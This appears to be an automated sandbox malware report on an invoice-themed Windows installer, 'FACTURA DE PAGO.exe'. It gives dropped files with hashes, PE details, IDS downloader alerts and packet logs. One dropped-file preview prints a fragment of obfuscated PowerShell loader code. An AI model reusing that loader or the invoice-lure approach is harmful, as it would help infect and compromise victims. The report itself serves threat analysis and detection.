Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(...F...F...F......F...G.v.F......F..v...F...@...F.Rich..F.........................PE..L....{.W.................`...\|.......1.......p....@.......................................@.................................4u....... ..X............................................................................p...............................text...._.......`.................. ..`.rdata..R....p.......d..............@..@.data....T...........x..............@....ndata...0...............................rsrc...X.... .......~..............@..@................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Kinna\FACTURA DE PAGO.exe:Zone.Identifier

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Kinna\strudsfjerenes.uns

Download File

Process:	C:\Users\user\Desktop\FACTURA DE PAGO.exe
File Type:	data
Category:	dropped
Size (bytes):	411197
Entropy (8bit):	3.2412073600303604
Encrypted:	false
SSDEEP:	6144:QuopzWTN5dkmo9X81LoYHLr0FJfFYcRQOD:KkxkfDEC
MD5:	9548F6F7A71852794789DE0AC5FDE451
SHA1:	74C915E2C9C110929FD87C907BE17930B0B66B24
SHA-256:	2D3371072047972236B2BAD7280E34BA1FD041C99CD132BC0E1DD767D0AFC471
SHA-512:	0468FCA29C3F916CBC0B3B132EA24BB582ED0F0D4921523F5DF6EE17F76709437D25324E08AF3C43FCAE8BD1B9F388E49B64ED3C8464062E7D099B0D6B9BC5DE
Malicious:	false
Preview:	....u...........................................................#.k4..`.......K....................7F#.....-....................Z.........v.................#.............p...<.....5.j...........p....j....... 4.....h................q.2.......C..................................,.............\........#..................e..........b.........................o..8.e........'.Q......<..........e.x...8......=.......}.....QU......E.....O............................6....^.y.....~........i..........................Q..`.>...........m..........,................6/..._..f....\.........`.y.............................6...............2[........................)..........................<....7......6..................8.....................................b...........................3.....U.......N.........k8.x.........................)~..............o.....+.............6............Y.>....................e.J....S...t..........K........................P\.............r...................... ............

C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Kinna\unnamed.jpg

Download File

Process:	C:\Users\user\Desktop\FACTURA DE PAGO.exe
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 512x512, components 3
Category:	dropped
Size (bytes):	15845
Entropy (8bit):	7.693658939604953
Encrypted:	false
SSDEEP:	384:dnSPb8riksvdEh0qrjVqIPrLgrpNQMUBWud20p:dnUwriksvMjrZqo3Up9U8ud20p
MD5:	762778DFE1B62D3430B44A32AEDC03E0
SHA1:	7317D9579F9F4C4BEF82BE64FB3DFFB63160EEC5
SHA-256:	9A602EBAFC1F46AAD7248F6DA82938CE382DE9FFBC6C472BD4848D4519CA67A8
SHA-512:	B39A8F6DC07F3A4CFE3CF5E1563543ECE2864FECED28282356FA64D7D0B50FA43B70F57FC8A2C4424A553E14E6BE526293D90F56C63994EC79F5520488EE0CCF
Malicious:	false
Preview:	......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..IE..'...Ph.....(....(...)(...(....(...J`.QI@.(....(.....(....(....)(...).f..(.......Q@.%.P.IE..RQE...Q@..).RQE...Q@.%.P.IE...%.P.IE..RQE.mQE..bQE..QE%..QE......QE%..QE.......QI@..Q@.%.P.IE..RQE..QI@..RP.E.....RS.i(...%.P.IE%.-%.P.IE..RQE...Q@..).RQE...Q@.%.P0....J(...-%.P.IE...IE..aE...QE..QE%..QE.%.Q@...S...J..QI@.IE..RQE...Q@..RP.E...QE%0.(...%...-%...QE..RQE...Q@.%.P0

C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Klipfisks\psychograph.rut

Download File

Process:	C:\Users\user\Desktop\FACTURA DE PAGO.exe
File Type:	data
Category:	dropped
Size (bytes):	91155
Entropy (8bit):	3.2484639775571122
Encrypted:	false
SSDEEP:	768:sx0eYUpSjZTH4Refp/ZwLfKCGhiKveAC4LjJNV8RHwnx/F0H0jbPYER9RLXLxFJi:8UhyD9meQZFRRbLXdDRseVQq4
MD5:	55DD84338306B8F361571D07E3D03F25
SHA1:	5F086147B0ED6D4CBE40B6F81C1003EB07714B94
SHA-256:	016DE5BD5CEBA70CD0041265F69BE3BB6FF54D3DCA19340ED44DC15317066E45
SHA-512:	045E39931094C1D423D69C4BEF750CACF56E0DEF562162211F51F1B5E0C3E265ACEDE7FC06979CFCE68762A99180317419685E5542D3E44882B11116D1EE7FE8
Malicious:	false
Preview:	....7.................3.........}.......Q.....................~........y.........u...4...bp..o......z.......................................................k.............Tg.....`..Q.........<........A........f.....X..."..............^.........@....\|..........................h....X..................1.......zh...........3..>..)...Y....:.................GG.....+F#...z.~.....!....................:..............(.................Y....7.......5..^..{.......D...`................O..............z#..............4$...a..............o....................c..s.......=......^..~..................................B....o.......................................l:...........*Y..i.".C..i............_.........).....-...............\|P.......b......h....~.....w+....................-....1.......<...6.........b.".@...................1...P....s..h9.......l........H..................k...e........<.......f...;...............m....W...........h.g.%...........-........."..................S......F.....e........

C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Udlaanslofterne\Dichapetalum\aktivitetsrunde.txt

Download File

Process:	C:\Users\user\Desktop\FACTURA DE PAGO.exe
File Type:	ASCII text, with very long lines (360), with CRLF line terminators
Category:	dropped
Size (bytes):	362
Entropy (8bit):	4.295609901239941
Encrypted:	false
SSDEEP:	6:OV0mI/AA3CU6sDq6ry0bxmAOvFz0/TWEMsesxM7JXZO:OVcAV6yw3Ovx0/q3shK7Js
MD5:	A47DE65B255D62E154E75208730B37D2
SHA1:	9AD95C489EABDBCD12C02CD312C85D0C73A565F7
SHA-256:	1527C27BE377FB2EFDB75E64EF88FEE6B879712DEC1AE6E8CCA4E66188099784
SHA-512:	206FB780CA6A6BEA7B1DA2AAD8D1E8C38331AE5A03CC82FC181A6E13234DC4523033AA775A3F15C261FEC74910ECAF622ABAC99444E8DAA8B63EC35379FBE29A
Malicious:	false
Preview:	beboere sletteprogrammerne afbrndtes untruthfulness,methanolysis blokniveauets tegnbaseret keisar arbejdsmndene rger,lsenets quindecimvir complexify hundevagten cymblernes.cressier immediate batchkrslerne antisepalous cryptonymic pings,pampination spytkirtlen vandranunkel stormmaage,diversificer udtalendes attributgrammatiks snedkeris sati frailejon rvturene..

C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Udlaanslofterne\Dichapetalum\discourteously.gam

Download File

Process:	C:\Users\user\Desktop\FACTURA DE PAGO.exe
File Type:	GTA audio index data (SDT)
Category:	dropped
Size (bytes):	339224
Entropy (8bit):	3.2329059465811363
Encrypted:	false
SSDEEP:	3072:TlwUufGWwltoSeWq5Xck5tiy5ScV95Cca+8aB5p0jsDytfuWoaP/ZTf:x3W045X/5tiyB8faB5p4sD22uN
MD5:	2AFAF6367CF5833A8885999FEFA5B44A
SHA1:	58EDFAC56FD3BDA98CAD7F2A784F58CF0CCCA5A9
SHA-256:	66D0440913A064549BF52DD102475A422A55A0A1A99A38C0445CCF84EB98C074
SHA-512:	A769F552CD91CE7163FE25C6E785D3A225979A9E50805F031C05E52CF5F82FB1E582FE621C947C7B0709F9E627C6CF318CF899CA97CC2BC4A3D934B94C2279A4
Malicious:	false
Preview:	........5M.....]...................[8...........t...........j.kKk.............Y.3.-.........u.....'.......<..............0..............-.....m....q.%.........S....F......6.............M.C.z.........m.\|..............m...].-..<.......0.............o......QL....x....... ..........p.........?.'.a........:.........K............................#............Z).......$......................................9......................_u...1...S>............................c....K\......l.......z............%..(..........8...........z.........\....$......._.g...........v.....{R..............;.............R........1........:...Q...........W..W....................................F .....-...b..F........G...,CH......}...D....b...........9...8...q......Y....R..............................................<..............=...~................. ...........u.......T...B..............i............`....r...........R..............1.2........................../....#.......b.............;...............-..+

C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Udlaanslofterne\Incuss.Pen

Download File

Process:	C:\Users\user\Desktop\FACTURA DE PAGO.exe
File Type:	ASCII text, with very long lines (3179), with CRLF, LF line terminators
Category:	dropped
Size (bytes):	53691
Entropy (8bit):	5.3301215624771165
Encrypted:	false
SSDEEP:	768:y8ydwJkymbROj2OT/UOomJZlXFpMI7k9D1Og/7wVKlMhVaPCQc2jVT:y8ycmd0DUOoGXFZKcg8OmVuD5
MD5:	F9BB610FDAF3E9FB1B4FAA9FFDDFAB51
SHA1:	B0858761694B149C52D79D915D24D6D8FE161D14
SHA-256:	9AAA17344E82A1134FF2B6C6E1EEE773F703FD9F110B9B58FDFB87824F5DEF78
SHA-512:	34F0F7CE7E4CBEB1CE0B699CFC97E5F6619DCD238FBA0D9B30645D4FBC4AD5D97149355703568484B5110C621ACD8EB1A0FB748359D4473CD7BF4B85235DEF54
Malicious:	true
Preview:	$Geosid=$Dataskrms98;..<#Anfrslen Legalised Demurringly #>..<#dialuric Divinization Oprrsgrupperne Trakkasseriernes aqualunger socialforskningsinstituttet Tnkning #>..<#Lsesalen Irreprovableness Afplukninger Reaccentuating peelite Chelifer Aphrasia #>..<#Journalmedarbejderes Assimileringer Sgeretningen starutters #>..<#Fremontia Summat Inaudibility #>..<#tidsfunktions Chlorastrolite Cannibal #>...$Kladdebger = @'. re i.Depre$StyrtPvitelrPaalieEjecttP espeRu.tenAandecKos fefotog1Rabfa4 Flge3Crush=H rsk$Tal,iFJoahcoCham rAfkorm dskaoTopa d ynaeZacha; Proj..iberfPa hyuDory.n Ram c.illptByraai Co so Fne.nSolve No.infHo.gia u fecVoldfkTerebi PotenBab lg peplsCon e Hardi(Vangs$PsalmCObserhLithoa depelReappaMicrozSilk a Bic ,Guill$Udmr,K,nvilaA pelrLogiko WhintGrrfuiJauncnReckueGenudnfaheysFagal)Gillb Zineb{mu ns.Va dr.S.lve$AnisoB,tilfaSal,slDeglunTea.reBevgeu Kr mm Pret Winkl(Sa,piLAntiqiAnag vTriansConvusMalayy LandnsepareSjlefnKa areOppersSuppe Akek 'Ver.sUNoegnnUndolcYpsilaFinkesS.tte$O

C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Uxoricidal.Cle

Download File

Process:	C:\Users\user\Desktop\FACTURA DE PAGO.exe
File Type:	data
Category:	dropped
Size (bytes):	322292
Entropy (8bit):	7.709587921432435
Encrypted:	false
SSDEEP:	6144:SSnZAidizRFgkFpjtBUJ44dfK8mcfMEf4W8Y/Vdym1B3C50c7rJGpjlNGeSy:SSnmowRFgWtBUJ4oSFc/gfWL/3ofJsj1
MD5:	7A5B44360C380432ECECA4C843D48CDA
SHA1:	3CA537ABBE8F574C6A619F738DC8AB3BCB7E26B5
SHA-256:	72B4863E0A3B4BFAE49943812C29CF0B52415569AC5A3A0CC41E7A15060CDAF0
SHA-512:	B882A08E1FA834E29A2A7DFB719C9A0D60ACD7D97CF5958F1541313FF15BB66B8AE7ADCFEABCF4BC35935D6B58E035C17ACFE0A199A7AD69DAD2C48E37DD74C8
Malicious:	false
Preview:	...............??.....Z............LLL.G..:.....kkk..WWW.....................A.......{{.@@................yyy....Z.gg.www..........N..................)))))))......T.rrrr....................@@.....--..............00......5....WW.....[....."..........9999............y..........................~.,....N......................._.....H........XXXXX....I.....jjj.......44444......mmmmm.......4........s................TTTT.........zz.......6........s.....p......<...................................RRR..gg....................n...>........$$....................g....yyyy..f..jj......................CC.BB........F.......[.....................................XXXXXX..............555......................................h..O.....((..fffffff.................Y.......................%%....................................................99............................666............>.].....LL..hh..(..,............---.......N.........................f...\|.................(........y..""".f..........R....2.....

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	7.714263627278454
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	FACTURA DE PAGO.exe
File size:	880'319 bytes
MD5:	de02502f79bc183714a9dfe879831170
SHA1:	c1fd975e0df663fd49e86ae1453d0ad3eccacea8
SHA256:	9e3ef4dbb2d13139c75e1cbf855114111e6378fc518b7666f972442134d06718
SHA512:	c921e2e02ed0969ad66ae503e3cc83d0e2a3c3d6d43814c8b31c3b8606cde77e6f39c9a4b41088c0718b182a84dc29cae5f609dff872e98dcd00ef28c58b6415
SSDEEP:	12288:l9LVa31WR5y/seQ/33WcLvfLn/ETeVlCE7vkQymGwSW01hXqvjoaCi7lnsZz0maD:/D5y/+/vfD/+alCJmvulW6Nd0vD
TLSH:	B3151246F7A9DAA7E831813014BE9535F234AC360561860B3366BF7A493337F091B6DE
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(...F...F...F......F...G.v.F......F...v...F...@...F.Rich..F.........................PE..L....{.W.................`...\|.....

File Icon


Icon Hash:	4ccc524656d64e01

Static PE Info

General

Entrypoint:	0x40310f
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x57807BD9 [Sat Jul 9 04:21:45 2016 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	b78ecf47c0a3e24a6f4af114e2d1f5de

Entrypoint Preview

Instruction
sub esp, 00000184h
push ebx
push esi
push edi
xor ebx, ebx
push 00008001h
mov dword ptr [esp+18h], ebx
mov dword ptr [esp+10h], 00409198h
mov dword ptr [esp+20h], ebx
mov byte ptr [esp+14h], 00000020h
call dword ptr [004070A8h]
call dword ptr [004070A4h]
cmp ax, 00000006h
je 00007FA76CDD1833h
push ebx
call 00007FA76CDD47A1h
cmp eax, ebx
je 00007FA76CDD1829h
push 00000C00h
call eax
mov esi, 00407298h
push esi
call 00007FA76CDD471Dh
push esi
call dword ptr [004070A0h]
lea esi, dword ptr [esi+eax+01h]
cmp byte ptr [esi], bl
jne 00007FA76CDD180Dh
push ebp
push 00000009h
call 00007FA76CDD4774h
push 00000007h
call 00007FA76CDD476Dh
mov dword ptr [0042E404h], eax
call dword ptr [00407044h]
push ebx
call dword ptr [00407288h]
mov dword ptr [0042E4B8h], eax
push ebx
lea eax, dword ptr [esp+38h]
push 00000160h
push eax
push ebx
push 00428828h
call dword ptr [00407174h]
push 00409188h
push 0042DC00h
call 00007FA76CDD4397h
call dword ptr [0040709Ch]
mov ebp, 00434000h
push eax
push ebp
call 00007FA76CDD4385h
push ebx
call dword ptr [00407154h]

Rich Headers

Programming Language:

[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x7534	0xa0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x42000	0x1aa58	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x7000	0x298	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x5fdd	0x6000	38462d04cfdbc4943d18be461d53cc3e	False	0.6783854166666666	data	6.499697507009752	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x7000	0x1352	0x1400	3d134ae5961af9895950a7ee0adc520a	False	0.4583984375	data	5.207538993430304	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x9000	0x254f8	0x600	2d00401e0c64d69b6d0ccb877d9f624e	False	0.4544270833333333	data	4.0323505938358934	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata	0x2f000	0x13000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x42000	0x1aa58	0x1ac00	098718c0c5bf54afe6e125c2f1ac35ba	False	0.23448452102803738	data	3.706045365348602	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_BITMAP	0x42460	0x368	Device independent bitmap graphic, 96 x 16 x 4, image size 768	English	United States	0.23623853211009174
RT_ICON	0x427c8	0x10828	Device independent bitmap graphic, 128 x 256 x 32, image size 0	English	United States	0.09021944871643203
RT_ICON	0x52ff0	0x32f2	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	English	United States	0.9443336911516639
RT_ICON	0x562e8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	English	United States	0.16089211618257263
RT_ICON	0x58890	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	English	United States	0.18738273921200752
RT_ICON	0x59938	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	English	United States	0.31050106609808104
RT_ICON	0x5a7e0	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	English	United States	0.440884476534296
RT_ICON	0x5b088	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	English	United States	0.5635838150289018
RT_ICON	0x5b5f0	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	English	United States	0.2703900709219858
RT_ICON	0x5ba58	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 0	English	United States	0.21908602150537634
RT_ICON	0x5bd40	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 0	English	United States	0.3716216216216216
RT_DIALOG	0x5be68	0x144	data	English	United States	0.5216049382716049
RT_DIALOG	0x5bfb0	0x13c	data	English	United States	0.5506329113924051
RT_DIALOG	0x5c0f0	0x100	data	English	United States	0.5234375
RT_DIALOG	0x5c1f0	0x11c	data	English	United States	0.6056338028169014
RT_DIALOG	0x5c310	0xc4	data	English	United States	0.5918367346938775
RT_DIALOG	0x5c3d8	0x60	data	English	United States	0.7291666666666666
RT_GROUP_ICON	0x5c438	0x92	data	English	United States	0.6575342465753424
RT_VERSION	0x5c4d0	0x248	data	English	United States	0.5308219178082192
RT_MANIFEST	0x5c718	0x340	XML 1.0 document, ASCII text, with very long lines (832), with no line terminators	English	United States	0.5540865384615384

Imports

DLL	Import
KERNEL32.dll	SetEnvironmentVariableA, Sleep, GetTickCount, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, GetFileAttributesA, SetFileAttributesA, GetWindowsDirectoryA, GetTempPathA, GetCommandLineA, lstrlenA, GetVersion, SetErrorMode, lstrcpynA, ExitProcess, GetFullPathNameA, GlobalLock, CreateThread, GetLastError, CreateDirectoryA, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, ReadFile, WriteFile, lstrcpyA, MoveFileExA, lstrcatA, GetSystemDirectoryA, GetProcAddress, CloseHandle, SetCurrentDirectoryA, MoveFileA, CompareFileTime, GetShortPathNameA, SearchPathA, lstrcmpiA, SetFileTime, lstrcmpA, ExpandEnvironmentStringsA, GlobalUnlock, GetDiskFreeSpaceA, GlobalFree, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, GetPrivateProfileStringA, FindClose, MultiByteToWideChar, FreeLibrary, MulDiv, WritePrivateProfileStringA, LoadLibraryExA, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, GlobalAlloc
USER32.dll	ScreenToClient, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, PostQuitMessage, GetWindowRect, EnableMenuItem, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, ReleaseDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndDialog, RegisterClassA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, GetDC, CreateDialogParamA, SetTimer, GetDlgItem, SetWindowLongA, SetForegroundWindow, LoadImageA, IsWindow, SendMessageTimeoutA, FindWindowExA, OpenClipboard, TrackPopupMenu, AppendMenuA, EndPaint, DestroyWindow, wsprintfA, ShowWindow, SetWindowTextA
GDI32.dll	SelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
SHELL32.dll	SHGetSpecialFolderLocation, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA
ADVAPI32.dll	RegDeleteKeyA, SetFileSecurityA, OpenProcessToken, LookupPrivilegeValueA, AdjustTokenPrivileges, RegOpenKeyExA, RegEnumValueA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
COMCTL32.dll	ImageList_Create, ImageList_AddMasked, ImageList_Destroy
ole32.dll	OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-10-21T11:16:46.535494+0200	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.4	49736	216.58.206.46	443	TCP
2024-10-21T11:16:52.929125+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	49738	193.122.6.168	80	TCP
2024-10-21T11:16:54.210380+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	49738	193.122.6.168	80	TCP
2024-10-21T11:16:54.926325+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49740	188.114.97.3	443	TCP
2024-10-21T11:16:55.835397+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	49741	193.122.6.168	80	TCP
2024-10-21T11:16:56.563306+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49742	188.114.97.3	443	TCP
2024-10-21T11:16:58.201916+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49744	188.114.97.3	443	TCP
2024-10-21T11:16:59.851756+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49746	188.114.97.3	443	TCP
2024-10-21T11:17:01.461686+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49748	188.114.97.3	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 21, 2024 11:16:45.205578089 CEST	49736	443	192.168.2.4	216.58.206.46
Oct 21, 2024 11:16:45.205616951 CEST	443	49736	216.58.206.46	192.168.2.4
Oct 21, 2024 11:16:45.205836058 CEST	49736	443	192.168.2.4	216.58.206.46
Oct 21, 2024 11:16:45.228250027 CEST	49736	443	192.168.2.4	216.58.206.46
Oct 21, 2024 11:16:45.228265047 CEST	443	49736	216.58.206.46	192.168.2.4
Oct 21, 2024 11:16:46.110109091 CEST	443	49736	216.58.206.46	192.168.2.4
Oct 21, 2024 11:16:46.110256910 CEST	49736	443	192.168.2.4	216.58.206.46
Oct 21, 2024 11:16:46.111232996 CEST	443	49736	216.58.206.46	192.168.2.4
Oct 21, 2024 11:16:46.111321926 CEST	49736	443	192.168.2.4	216.58.206.46
Oct 21, 2024 11:16:46.159521103 CEST	49736	443	192.168.2.4	216.58.206.46
Oct 21, 2024 11:16:46.159538031 CEST	443	49736	216.58.206.46	192.168.2.4
Oct 21, 2024 11:16:46.160470009 CEST	443	49736	216.58.206.46	192.168.2.4
Oct 21, 2024 11:16:46.160540104 CEST	49736	443	192.168.2.4	216.58.206.46
Oct 21, 2024 11:16:46.163420916 CEST	49736	443	192.168.2.4	216.58.206.46
Oct 21, 2024 11:16:46.207438946 CEST	443	49736	216.58.206.46	192.168.2.4
Oct 21, 2024 11:16:46.535521030 CEST	443	49736	216.58.206.46	192.168.2.4
Oct 21, 2024 11:16:46.535753012 CEST	49736	443	192.168.2.4	216.58.206.46
Oct 21, 2024 11:16:46.535753012 CEST	49736	443	192.168.2.4	216.58.206.46
Oct 21, 2024 11:16:46.535828114 CEST	443	49736	216.58.206.46	192.168.2.4
Oct 21, 2024 11:16:46.536058903 CEST	49736	443	192.168.2.4	216.58.206.46
Oct 21, 2024 11:16:46.557259083 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:46.557296991 CEST	443	49737	142.250.186.33	192.168.2.4
Oct 21, 2024 11:16:46.557384014 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:46.557579994 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:46.557595015 CEST	443	49737	142.250.186.33	192.168.2.4
Oct 21, 2024 11:16:47.441149950 CEST	443	49737	142.250.186.33	192.168.2.4
Oct 21, 2024 11:16:47.441346884 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:47.444875956 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:47.444889069 CEST	443	49737	142.250.186.33	192.168.2.4
Oct 21, 2024 11:16:47.445278883 CEST	443	49737	142.250.186.33	192.168.2.4
Oct 21, 2024 11:16:47.446165085 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:47.446444988 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:47.491409063 CEST	443	49737	142.250.186.33	192.168.2.4
Oct 21, 2024 11:16:49.940116882 CEST	443	49737	142.250.186.33	192.168.2.4
Oct 21, 2024 11:16:49.940237045 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:49.948281050 CEST	443	49737	142.250.186.33	192.168.2.4
Oct 21, 2024 11:16:49.948357105 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:50.054821968 CEST	443	49737	142.250.186.33	192.168.2.4
Oct 21, 2024 11:16:50.054904938 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:50.054922104 CEST	443	49737	142.250.186.33	192.168.2.4
Oct 21, 2024 11:16:50.054974079 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:50.055015087 CEST	443	49737	142.250.186.33	192.168.2.4
Oct 21, 2024 11:16:50.055064917 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:50.055097103 CEST	443	49737	142.250.186.33	192.168.2.4
Oct 21, 2024 11:16:50.055141926 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:50.070341110 CEST	443	49737	142.250.186.33	192.168.2.4
Oct 21, 2024 11:16:50.070434093 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:50.070447922 CEST	443	49737	142.250.186.33	192.168.2.4
Oct 21, 2024 11:16:50.070488930 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:50.075006962 CEST	443	49737	142.250.186.33	192.168.2.4
Oct 21, 2024 11:16:50.075057030 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:50.075112104 CEST	443	49737	142.250.186.33	192.168.2.4
Oct 21, 2024 11:16:50.075294971 CEST	49737	443	192.168.2.4	142.250.186.33
Oct 21, 2024 11:16:50.084822893 CEST	443	49737	142.250.186.33	192.168.2.4
